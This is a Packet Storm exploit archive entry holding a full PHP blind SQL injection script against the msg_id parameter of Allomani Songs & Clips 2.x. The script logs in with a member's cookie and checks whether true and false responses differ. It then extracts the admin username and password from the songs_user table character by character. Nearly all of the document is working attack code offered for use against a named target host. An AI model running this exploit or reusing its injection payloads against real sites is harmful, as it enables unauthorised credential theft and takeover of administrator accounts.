Allomani Songs And Clips 2.x Blind SQL Injection

2011-08-14T00:00:00
ID PACKETSTORM:104027
Type packetstorm
Reporter ahwak2000
Modified 2011-08-14T00:00:00

Description

                                        
                                            `<?php  
/*  
===============================================================  
Allomani Songs & Clips 2.x (msg_id) Blind SQL Injection Exploit  
===============================================================  
#[+]Version : 2.x  
#[+]Author : ahwak2000  
#[+]home : tryag.cc/cc/ ~ p0c.cc/vb/  
#[+]Date : 13.08.2011  
#[+]E-mail : z.u5[at]hotmail.com  
#[+]secript home: http://allomani.com  
#[+]Tested On: win xp sp3  
===============================================================  
*/  
ini_set("max_execution_time",0);  
print_r('  
___________________________  
________________________| Allomani 2.x eXploit 0d4y |_________________________  
_ _ _ _ _ _ _ _ _____ _____ _____ _____  
/ _ \ | | | | | | __ | | / _ \ | |// | _ | / _ \ / _ \ / _ \  
| |_| | | |_| | | | / \ | | | |_| | | \ |_| / / | | | | | | | | | | | |  
| | | | | _ | | |/ /\ \| | | | | | | |\ \ / /__ | |_| | | |_| | | |_| |  
|_| |_| |_| |_| |___/ \___| |_| |_| |_| \_\ |_____| \_____/ \_____/ \_____/  
_______________________________________________________________________________  
z.u5@hotmail.com  
');  
if ($argc<5) {  
print_r('  
-----------------------------------------------------------------------------  
  
example: php '.$argv[0].' allomain.com /demo/ user_pass user_id  
  
-----------------------------------------------------------------------------  
');  
die;  
}  
function AHWAK($victim,$vic_dir,$user_pass,$user_id,$inj){  
$host = $victim;  
$p = "http://".$host.$vic_dir;  
//$cookie = base64_encode(":".$inj.":");  
$packet ="GET ".$p."/usercp.php?action=msg_reply&msg_id=89".$inj." HTTP/1.0\r\n";  
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";  
$packet.="Host: ".$victim."\r\n";  
$packet.="Cookie: songs_member_data_id=".$user_id."; songs_member_data_password=".md5($user_pass).";\r\n";  
$packet.="Pragma: no-cache\r\n";  
$packet.="Connection: Close\r\n\r\n";  
  
$o = @fsockopen($host, 80);  
if(!$o){  
echo "\n[x] No response...\n";  
die;  
}  
  
fputs($o, $packet);  
while (!feof($o)) $data .= fread($o, 1024);  
fclose($o);  
  
$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );  
if ( !empty($_404) ){  
echo "\n[x] 404 Not Found... Make sure of path. \n";  
die;  
}  
  
return $data;  
  
}  
function AHWAK_GET($from){  
preg_match_all("(<textarea .*>(.*)</textarea>)siU", $from, $out);  
return $out[1][0];  
}  
  
$host1 = $argv[1];  
$dir1=$argv[2];  
$userpass=$argv[3];  
$userid=$argv[4];  
  
if ($argc > 4) {  
echo "\nPlease wait...\r\n\r\n";  
$login= AHWAK($host1,$dir1,$userpass,$userid,"");  
  
if(!eregi ("profile",$login)){  
  
echo "\n\n\t[-] You have entered an invalid username or password.\n\n\n";  
exit;   
}  
  
$truths = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"' and 1='1/*"));  
$falses = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"' and 1='2/*"));  
if ($truths == $falses) {  
  
echo "\n\t sorry: magic_quotes_gpc = On ): \n";  
exit;  
}  
echo "\n\t[+] Getting Admin UserName And PassWord\n\n\t";  
echo "\n\t-----------------------------------\n\n";  
for ($g = 1; $g <= 16; $g++) { //eidt  
for ($i = 46; $i <= 122; $i++) {  
$qest = AHWAK_GET(AHWAK($host1,$dir1,$userpass,$userid,"'+and+ascii(MiD((sElEct+concat_ws(0x3a,username,password)+frOm+songs_user+liMit 0,1),".$g.",1))='".$i."/*"));  
if ($qest == $truths) {  
echo chr($i);  
}  
}  
}  
  
echo "\n\n\t-----------------------------------\n\n\tBy Ahwak2000\n\n";  
}  
  
?>  
`